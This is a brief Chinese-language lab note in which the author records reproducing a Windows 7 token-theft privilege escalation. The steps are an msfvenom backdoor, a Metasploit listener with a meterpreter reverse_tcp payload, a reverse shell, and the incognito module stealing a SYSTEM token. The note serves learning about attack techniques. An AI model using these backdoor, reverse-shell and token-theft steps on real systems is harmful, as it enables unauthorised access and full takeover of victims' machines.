记录初次复现令牌提权的攻击(使用的是win7的操作系统)
使用msfvenom生成后门程序连接上主机进行监听
show options将需要设置的都设置好
{ set payload windows/meterpreter/reverse_tcp
set lhost ip地址
set lport 监听端口
}
设置好后直接run开启监听
运行后门程序
监听到后门,反弹shell。并且查看此时的uid,可以看到是admin的权限,直接使用incognito模块,看有啥可以窃取的令牌,发现有system的直接窃取
再次查看getuid直接变成system权限了